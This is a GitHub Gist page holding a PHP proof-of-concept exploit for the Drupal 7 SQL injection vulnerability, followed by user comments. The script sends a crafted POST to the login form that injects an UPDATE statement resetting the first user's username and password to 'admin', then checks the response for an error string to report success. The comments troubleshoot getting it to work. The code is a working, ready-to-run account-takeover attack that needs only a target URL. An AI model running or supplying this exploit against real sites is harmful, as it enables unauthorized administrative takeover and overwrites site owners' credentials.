-
-
Save milankragujevic/61eb72df71b69df80e86 to your computer and use it in GitHub Desktop.
| <?php | |
| /******************************************************** | |
| * Drupal 7 SQL Injection vulnerability demo | |
| * Created by Milan Kragujevic (of milankragujevic.com) | |
| * Read more at http://milankragujevic.com/post/66 | |
| * This will change the first user's username to admin | |
| * and their password to admin | |
| * Change $url to the website URL | |
| ********************************************************/ | |
| $url = '[URL HERE]'; // URL of the website (http://domain.com/) | |
| $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
| $params = array( | |
| 'http' => array( | |
| 'method' => 'POST', | |
| 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 'content' => $post_data | |
| ) | |
| ); | |
| $ctx = stream_context_create($params); | |
| $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
| if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { | |
| echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"; | |
| } else { | |
| echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| } |
This approach seems quite interesting to me, but would you mind presenting a similar "less destructive" version of this exploit/test?
My $data variable comes back empty using this code, and I'm entering the url correctly using my dev server and a 7.31 site that I maintain.
@McBochi I'm working on it. I'll update the blog post if I discover something.
@jordanIgraham Please "echo $url . '?q=node&destination=node';" and open the output URL in the browser. Maybe you're simply not entering the URL correctly, or PHP is being blocked by some other means. Turn on error_reporting and display_errors. I can't reproduce the issue.
@milankragujevic thanks - omitted "http://" in my url - now much data, but the data is the html of the site at $url. The string 'mb_strlen() expects parameter 1 to be string' is not in the $data. If it's helpful, echo $ctx outputs "Resource id #2".
Not really. You should try logging in to the website... If the website has PHP display_errors turned off, you won't see the error. There is no way to verify other than to try and log in.
Did you enter the URL correctly? ("http://domain.com/") Maybe the website is using CloudFlare or forbids empty User-Agent headers... Also try logging in, if the website has errors disabled it might indicate it's not vulnerable when in fact it is.